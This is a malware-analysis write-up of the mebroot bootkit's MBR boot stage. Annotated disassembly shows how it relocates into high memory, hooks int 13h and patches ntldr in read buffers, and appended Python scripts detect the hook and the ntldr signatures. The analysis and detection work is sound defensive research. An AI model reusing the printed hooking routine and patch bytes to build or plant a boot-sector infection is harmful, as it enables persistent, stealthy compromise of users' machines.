mebroot MBR boot-stage analysis
by nEINEI / vxjump.net
2011-08-22
neineit_at_gmail.com

(preceding text truncated) ... 0x27f

seg000:7C16 83 2C 02          sub word ptr [si], 2   ; attach itself in the last 2 KB of system memory, i.e. the tail of conventional memory
// On my own local XP SP2 test machine, [si] --> 0x27d at this point
seg000:7C19 AD                lodsw                  // read [si] (0x27d) into ax
seg000:7C1A C1 E0 06          shl ax, 6              // ax --> 9f40: this is the address where the virus will hide itself; at this point the memory at 0x9f40 is all zeros
//0x0000000000009f40 : 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000
//0x0000000000009f50 : 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000
//0x0000000000009f60 : 0x0000 0x0000 0x0000 0x0000
// Next it copies itself to 0x9f40
seg000:7C1D 8E C0             mov es, ax             ; es serves as the segment register for the destination di
seg000:7C1F BE 00 7C          mov si, 7C00h
seg000:7C22 33 FF             xor di, di
seg000:7C24 B9 00 01          mov cx, 256
seg000:7C27 F3 A5             rep movsw              ; copy its own 512 bytes over
// Memory contents after the copy completes
0x000000000009f400 : 0x33fa 0x8edb 0x36d3 0x2689 0x7bfe 0xfebc 0x1e7b 0x60 66
0x000000000009f410 : 0x8efc 0xbedb 0x0413 0x2c83 0xad02 0xe0c1 0x8e06 0xbe c0
0x000000000009f420 : 0x7c00 0xff33 0x00b9 0xf301 0xb8a5 0x0202 0x3db1 0x80 ba
0x000000000009f430 : 0x8b00 0xcddf 0x3313 0x66db 0x478b 0x664c 0xa326 0x00 73
0x000000000009f440 : 0x47c7 0x664c 0x8c00 0x4e47 0x6806 0x004d 0xfbcb 0xc3 8e
0x000000000009f450 : 0x01b8 0xb902 0x003f 0x80ba 0xb700 0xcd7c 0x6613 0x1f 61
0x000000000009f460 : 0xea5c 0x7c00
seg000:7C29 B8 02 02          mov ax, 202h           ; al - 02, ah - 02: read 2 sectors
seg000:7C2C B1 3D             mov cl, 61             ; starting at sector 60
seg000:7C2E BA 80 00          mov dx, 80h            ; '€' ; drive is the default 80h
seg000:7C31 8B DF             mov bx, di             ; buffer; bx is 0x200 now, i.e. es:0x200 = 0x9f40:200 -> 9f600
seg000:7C33 CD 13             int 13h                ; DISK - READ SECTORS INTO MEMORY
seg000:7C33                                          ; AL = number of sectors to read, CH = track, CL = sector
seg000:7C33                                          ; DH = head, DL = drive, ES:BX -> buffer to fill
seg000:7C33                                          ; Return: CF set on error, AH = status, AL = number of sectors read
// At this point the virus's contents from sector 60 have been read into memory at 0x9f60:0000; this is the ntldr hook code, 16-bit code
0x000000000009f600 : 0xf08b 0xc085 0x759c 0x8305 0x2444 0x0004 0xfc60 0x7c 8b
0x000000000009f610 : 0x2424 0xe781 0x0000 0xfff0 0xc7b0 0x75ae 0x81fd 0x46 3f
0x000000000009f620 : 0x0034 0x7540 0xb0f5 0xaea1 0xfd75 0x378b 0x368b 0x36 8b
0x000000000009f630 : 0x5e8b 0x8b18 0x43eb 0x3b81 0x4b6a 0x196a 0xf775 0x7b 80
0x000000000009f640 : 0x8904 0x0375 0xc383 0x8006 0x047b 0x75e8 0x8de8 0x09 7b
0x000000000009f650 : 0xe8b0 0x75ae 0x66fd 0x7f81 0x8404 0x75c0 0x8bd8 0x8d 17
0x000000000009f660 : 0x3a54 0xe804
// And the virus's contents from sector 61 have been read into memory at 0x9f60:0200; this is the kernel hook code
0x000000000009f800 : 0x148b 0x6824 0x5678 0x1234 0x0c8b 0x6824 0x5678 0x12 34
0x000000000009f810 : 0x200f 0x50c0 0xff25 0xfeff 0x0fff 0xc022 0xca2b 0x0f 58
0x000000000009f820 : 0xc022 0x34ff 0x6824 0xe062 0x3707 0x3be8 0x0000 0x59 00
0x000000000009f830 : 0x6859 0x01ab 0x0000 0x006a 0xd0ff 0xe860 0x0000 0x00 00
0x000000000009f840 : 0x835e 0x15c6 0xf88b 0x6a6a 0xf359 0xb1a5 0x8d80 0x00 be
0x000000000009f850 : 0xfffe 0xffff 0x33e0 0x61c0 0x74ff 0x0c24 0x54ff 0x08 24
0x000000000009f860 : 0x5a59 0x8760
// The original Windows MBR has not been loaded yet at this point
// Now it hooks the int 13h interrupt.
seg000:7C35 33 DB             xor bx, bx
seg000:7C37 66 8B 47 4C       mov eax, [bx+4Ch]      // 0x4c / 4 = 0x13: load the contents of the int 13h vector into eax
// Data at 0x4c at this point
0x000000000000004c : 0xe3fe
seg000:7C3B 66 26 A3 73 00    mov es:73h, eax        ; save the original int 13h handler address; remember this offset, it is used again later
// Saved at 0x9f40:73 in the relocated segment (the old int 13h address)
0x000000000009f473 : 0xe3fe 0xf000 0x882e 0x9026 0x9d00 0x2e9c 0x1eff 0x0
seg000:7C40 C7 47 4C 66 00    mov word ptr [bx+4Ch], 66h ; offset 66h, the new entry routine at offset 66h from the start; call it Interrupt_13_hook
seg000:7C45 8C 47 4E          mov word ptr [bx+4Eh], es
seg000:7C48 06                push es
seg000:7C49 68 4D 00          push 4Dh               ; jump to sub_7c4d; es has already been adjusted to point at the segment at the end of memory, i.e. reloc_meb_bootloader, so the following code executes from the relocated copy
seg000:7C4C CB                retf
// Execution now jumps to 9f44d in memory
(0) [0x000000000009f44d] 9f40:004d (unk. ctxt): sti ; fb
// Below is the code in IDA, equivalent to 9f44d in memory
seg000:7C4D FB                sti
seg000:7C4E 8E C3             mov es, bx             ; bx is 0 here; es is reset for the destination di
seg000:7C50 B8 01 02          mov ax, 201h           ; read 1 sector
seg000:7C53 B9 3F 00          mov cx, 63             ; sector 62
seg000:7C56 BA 80 00          mov dx, 80h
seg000:7C59 B7 7C             mov bh, 7Ch            ; bh: destination 7c00
seg000:7C5B CD 13             int 13h                ; DISK - READ SECTORS INTO MEMORY
seg000:7C5B                                          ; AL = number of sectors to read, CH = track, CL = sector
seg000:7C5B                                          ; DH = head, DL = drive, ES:BX -> buffer to fill
seg000:7C5B                                          ; Return: CF set on error, AH = status, AL = number of sectors read
seg000:7C5D 66 61             popad
seg000:7C5F 1F                pop ds
seg000:7C60 5C                pop sp
seg000:7C61 EA 00 7C 00 00    jmp loc_7C00           ; jump back to the start and boot again: the data from sector 62 (the original MBR) has been loaded at 7c00 and now executes
// Set an int 13h breakpoint: b 0009f466 --> this is the virus's int 13h hook location; 7c66 is equivalent to 9f466
Interrupt_13_hook proc far
seg000:7C66 9C                pushf
seg000:7C67 80 FC 42          cmp ah, 42h            ; extended int 13h read
seg000:7C6A 74 0B             jz short loc_7C77
seg000:7C6C 80 FC 02          cmp ah, 2              ; non-extended int 13h read
seg000:7C6F 74 06             jz short loc_7C77
seg000:7C71 9D                popf                   ; if it is neither of these two, call the original int 13h
// The logic above ensures that every int 13h read operation goes through the virus's hook code
// cs = 0x9f40 here; plus offset 0x90 that is 0x9f490; ah = 2 at this point
seg000:7C77 2E 88 26 90 00    mov cs:90h, ah
// The instruction above actually patches seg000:7C8D B4 [00] mov ah, 0 ---> into mov ah, 2
seg000:7C7C 9D                popf
seg000:7C7D 9C                pushf
seg000:7C7E 2E FF 1E 73 00    call dword ptr cs:73h  ; offset 73h was mentioned above; it holds the original int 13h handler. The virus does not know under what circumstances the system calls int 13h, but whenever it is a read call,
seg000:7C83 0F 82 9D 00       jb exit_int_13         ; the virus scans the buffer for the kernel signature bytes it wants to hook
seg000:7C87 9C                pushf
seg000:7C88 FA                cli
seg000:7C89 06                push es
seg000:7C8A 66 60             pushad
seg000:7C8C FC                cld
seg000:7C8D B4 00             mov ah, 0              ; this immediate is dynamically patched to the value of ah, recording whether this was a plain read or an extended read
seg000:7C8F B5 00             mov ch, 0
seg000:7C91 80 FD 42          cmp ch, 42h
seg000:7C94 75 04             jnz short loc_7C9A     ; ax = sector count
seg000:7C96 AD                lodsw                  ; in extended mode ds:si points to the disk address packet
seg000:7C97 AD                lodsw
seg000:7C98 C4 1C             les bx, [si]           ; buffer location
seg000:7C9A
seg000:7C9A loc_7C9A:                                ; CODE XREF: Interrupt_13_hook+2E
seg000:7C9A 85 C0             test ax, ax            ; ax = sector count
seg000:7C9C 75 01             jnz short loc_7C9F
seg000:7C9E 40                inc ax                 ; at least 1 sector, so each pass scans at least 512 bytes as the signature search range
seg000:7C9F
seg000:7C9F loc_7C9F:                                ; CODE XREF: Interrupt_13_hook+36
seg000:7C9F 8B C8             mov cx, ax
seg000:7CA1 B0 8B             mov al, 8Bh            ; first byte of the signature to match
seg000:7CA3 C1 E1 09          shl cx, 9              ; cx = 512 * sector count, the length of the region to scan for the signature
seg000:7CA6 8B FB             mov di, bx
seg000:7CA8 60                pusha
seg000:7CA9
seg000:7CA9 loc_7CA9:                                ; CODE XREF: Interrupt_13_hook+4F
seg000:7CA9                                          ; Interrupt_13_hook+57
seg000:7CA9 F2 AE             repne scasb
seg000:7CAB 75 47             jnz short loc_7CF4     ; look for the ntldr signature sequence 8B F0 85 F6 74 21/22 80 3D
seg000:7CAD 66 26 81 3D F0+   cmp dword ptr es:[di], 74F685F0h
seg000:7CB5 75 F2             jnz short loc_7CA9
seg000:7CB7 26 81 7D 05 80+   cmp word ptr es:[di+5], 3D80h
seg000:7CBD 75 EA             jnz short loc_7CA9
seg000:7CBF 26 8A 45 04       mov al, es:[di+4]
seg000:7CC3 3C 21             cmp al, 21h            ; check whether it is already hooked; 21h is the ntldr jz $23 instruction
seg000:7CC5 74 04             jz short loc_7CCB      ; infection flag
seg000:7CC7 3C 22             cmp al, 22h
seg000:7CC9 75 DE             jnz short loc_7CA9     ; not the signature we are looking for, keep searching
seg000:7CCB
seg000:7CCB loc_7CCB:                                ; CODE XREF: Interrupt_13_hook+5F
seg000:7CCB BE 0B 02          mov si, 20Bh           ; infection flag
seg000:7CCE 2E 80 3C 00       cmp byte ptr cs:[si], 0
seg000:7CD2 75 20             jnz short loc_7CF4
seg000:7CD4 2E 88 04          mov cs:[si], al        ; write the flag at offset 0xb past the virus MBR code; this al value is 0x21 or 0x22.
// Here es = 0x46a, di = 0x120; the virus code below is about to patch this location.
// The normal ntldr code is:
/*
00046b1f: ( ): mov si, ax                     ; 8bf0  --- patch these 2 bytes: 0xf0 is changed to ff 15
00046b21: ( ): test si, si                    ; 85f6
00046b23: ( ): jz .+33                        ; 7421
00046b25: ( ): cmp byte ptr ds:[di], 0xf8     ; 803df8
00046b28: ( ): scasb byte ptr es:[di], al     ; ae
00046b29: ( ): inc bx                         ; 43
00046b2a: ( ): add byte ptr ds:[bx+si], al    ; 0000
00046b2c: ( ): jz .+7                         ; 7407
00046b2e: ( ): xor si, si                     ; 33f6
*/
// The code after hooking:
/*
00046b1d: ( ): add byte ptr ds:[bx+si], al    ; 0000
00046b1f: ( ): call word ptr ds:[di]          ; ff15 ---------> patched into a call; the operand has not been relocated yet, it is computed and fixed up below
00046b21: ( ): test si, si                    ; 85f6
00046b23: ( ): jz .+33                        ; 7421
00046b25: ( ): cmp byte ptr ds:[di], 0xf8     ; 803df8
00046b28: ( ): scasb byte ptr es:[di], al     ; ae
00046b29: ( ): inc bx                         ; 43
00046b2a: ( ): add byte ptr ds:[bx+si], al    ; 0000
*/
seg000:7CD7 26 C7 45 FF FF+   mov word ptr es:[di-1], 15FFh ; hook ntldr: overwrite the original mov esi, eax with a jump to xxx
seg000:7CDD 66 8C C8          mov eax, cs            // cs = 0x9f40, the segment the virus MBR code runs in
seg000:7CE0 66 C1 E0 04       shl eax, 4             // compute the virus MBR linear base address
seg000:7CE4 05 00 02          add ax, 200h           // skip past the virus MBR code
seg000:7CE7 66 2E A3 FC 01    mov cs:1FCh, eax       // cs:1fch is an empty data area of the virus MBR; eax = 0x9f600 is stored here, which overwrites the in-memory MBR's 0x55aa signature
seg000:7CEC 2D 04 00          sub ax, 4
seg000:7CEF 66 26 89 45 01    mov es:[di+1], eax     ; write the target address eax = 0x9f5fc; the ntldr instruction becomes call [0x009f5fc], so control returns to the virus code
seg000:7CF4
seg000:7CF4 loc_7CF4:                                ; CODE XREF: Interrupt_13_hook+45
seg000:7CF4                                          ; Interrupt_13_hook+6C
seg000:7CF4 61                popa
// Second patch location
seg000:7CF5 B0 83             mov al, 83h            ; search for the next signature 83 C4 02 E9 00 00 E9 FD FF
seg000:7CF7
seg000:7CF7 loc_7CF7:                                ; CODE XREF: Interrupt_13_hook+9D
seg000:7CF7                                          ; Interrupt_13_hook+A8
seg000:7CF7 F2 AE             repne scasb
seg000:7CF9 75 25             jnz short loc_7D20
seg000:7CFB 66 26 81 3D C4+   cmp dword ptr es:[di], 0E902C4h
seg000:7D03 75 F2             jnz short loc_7CF7
seg000:7D05 66 26 81 7D 04+   cmp dword ptr es:[di+4], 0FFFDE900h
seg000:7D0E 75 E7             jnz short loc_7CF7
seg000:7D10 66 26 C7 45 FC+   mov dword ptr es:[di-4], 83909090h
seg000:7D19 26 83 65 06 00    and word ptr es:[di+6], 0
seg000:7D1E EB D7             jmp short loc_7CF7
seg000:7D20 ; ---------------------------------------------------------------------------
seg000:7D20
seg000:7D20 loc_7D20:                                ; CODE XREF: Interrupt_13_hook+93
seg000:7D20 66 61             popad
seg000:7D22 07                pop es
seg000:7D23 9D                popf
seg000:7D24
seg000:7D24 exit_int_13:                             ; CODE XREF: Interrupt_13_hook+1D
seg000:7D24 CA 02 00          retf 2
// This concludes the boot stage; what remains is for the code from its other sectors, now resident in memory, to be invoked.
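The relocation trick in the first half of the listing (lower the conventional-memory size word at BDA 0x413 by 2 KB, shift it by 6 to get a segment, copy the MBR there and point the int 13h vector into it) gives a defender a simple heuristic over a low-memory dump: the int 13h handler lives at or above the memory size the BIOS now reports. This is an added example, not part of the original write-up; the 640 KB image it inspects is constructed from the values in the listing (0x27d KB, vector 9f40:0066, original vector saved at offset 0x73).

```python
import struct

BDA_BASE_MEM_KB = 0x413   # BIOS data area: conventional memory size in KB
IVT_INT13 = 0x13 * 4      # IVT slot for int 13h (offset 0x4C, as in the listing)
SAVED_VECTOR_OFF = 0x73   # where this sample stores the original int 13h vector


def read_vector(mem, addr):
    """Return (segment, offset) of the far pointer stored at addr."""
    off, seg = struct.unpack_from("<HH", mem, addr)
    return seg, off


def int13_hook_check(mem):
    """Flag an int 13h vector that points into memory the BIOS claims not to have.

    A bootkit that steals the top of conventional memory lowers the KB count at
    0x413, so its handler sits between mem_kb*1024 and 0xA0000.  Option ROMs
    live above 0xA0000, so a legitimate vector fails this test.
    """
    mem_kb = struct.unpack_from("<H", mem, BDA_BASE_MEM_KB)[0]
    top_seg = mem_kb << 6                       # same KB -> segment shift the MBR uses
    seg, off = read_vector(mem, IVT_INT13)
    handler_linear = (seg << 4) + off
    suspicious = mem_kb * 1024 <= handler_linear < 0xA0000
    result = {"mem_kb": mem_kb, "top_seg": top_seg, "int13": (seg, off),
              "suspicious": suspicious, "saved_vector": None}
    if suspicious:
        # mebroot keeps the BIOS vector at hook_segment:0x73; recovering it lets
        # a responder compare against the vector a clean boot would install.
        result["saved_vector"] = read_vector(mem, (seg << 4) + SAVED_VECTOR_OFF)
    return result


def build_sample_image(hooked=True):
    """Constructed 640 KB low-memory image mirroring the listing's values."""
    mem = bytearray(0xA0000)
    if hooked:
        struct.pack_into("<H", mem, BDA_BASE_MEM_KB, 0x27D)      # 639 KB - 2 KB
        struct.pack_into("<HH", mem, IVT_INT13, 0x0066, 0x9F40)  # Interrupt_13_hook
        struct.pack_into("<HH", mem, 0x9F400 + SAVED_VECTOR_OFF, 0xE3FE, 0xF000)
    else:
        struct.pack_into("<H", mem, BDA_BASE_MEM_KB, 0x27F)      # untouched 639 KB
        struct.pack_into("<HH", mem, IVT_INT13, 0xE3FE, 0xF000)  # BIOS handler
    return mem


if __name__ == "__main__":
    print(int13_hook_check(build_sample_image()))
```

An EBDA also sits at the top of conventional memory on real hardware, so treat a hit as a lead to inspect the handler bytes, not as proof on its own.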
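The int 13h hook in the second half of the listing recognises two ntldr byte sequences and rewrites them in the read buffer; the same two sequences, in both their clean and rewritten forms, make a signature scanner for a captured ntldr image or a low-memory dump. This is an added example, not part of the original write-up: the clean patterns are the bytes the hook compares against, the rewritten patterns follow from its stores (FF 15 plus a 32-bit pointer before 80 3D; three NOPs before 83 C4 02 and a zeroed E9 displacement), and the sample buffers are constructed from the listing's ntldr bytes.

```python
import re
import struct

# Clean ntldr sequences the hook searches for (bytes compared in the listing).
CLEAN_SIG1 = re.compile(rb"\x8B\xF0\x85\xF6\x74[\x21\x22]\x80\x3D", re.DOTALL)
CLEAN_SIG2 = re.compile(rb"\x83\xC4\x02\xE9\x00\x00\xE9\xFD\xFF", re.DOTALL)
# What the same spots look like after the hook's stores have run.
HOOKED_SIG1 = re.compile(rb"\xFF\x15(.{4})\x80\x3D", re.DOTALL)  # call [imm32]
HOOKED_SIG2 = re.compile(rb"\x90\x90\x90\x83\xC4\x02\xE9\x00\x00\xE9\x00\x00", re.DOTALL)


def scan_ntldr_buffer(buf):
    """Return sorted (offset, kind, detail) tuples for every hit in buf."""
    hits = []
    for m in CLEAN_SIG1.finditer(buf):
        hits.append((m.start(), "clean_sig1", None))
    for m in CLEAN_SIG2.finditer(buf):
        hits.append((m.start(), "clean_sig2", None))
    for m in HOOKED_SIG1.finditer(buf):
        target = struct.unpack("<I", m.group(1))[0]
        # The listing stores (cs << 4) + 0x200 - 4, a pointer into conventional
        # memory; only report call targets below 0xA0000 to limit false hits.
        if target < 0xA0000:
            hits.append((m.start(), "hooked_sig1", target))
    for m in HOOKED_SIG2.finditer(buf):
        hits.append((m.start(), "hooked_sig2", None))
    return sorted(hits)


def build_samples():
    """Constructed (clean, hooked) buffers from the ntldr bytes in the listing."""
    clean = bytes.fromhex("8bf0 85f6 7421 803df8 ae 43 0000 7407 33f6"
                          "cccccc"                        # filler before sig2
                          "83c402 e90000 e9fdff")
    hooked = bytes.fromhex("ff15 fcf50900 803df8 ae 43 0000 7407 33f6"
                           "909090"                       # NOPs written at di-4
                           "83c402 e90000 e90000")
    return clean, hooked


if __name__ == "__main__":
    for name, buf in zip(("clean", "hooked"), build_samples()):
        print(name, scan_ntldr_buffer(buf))
```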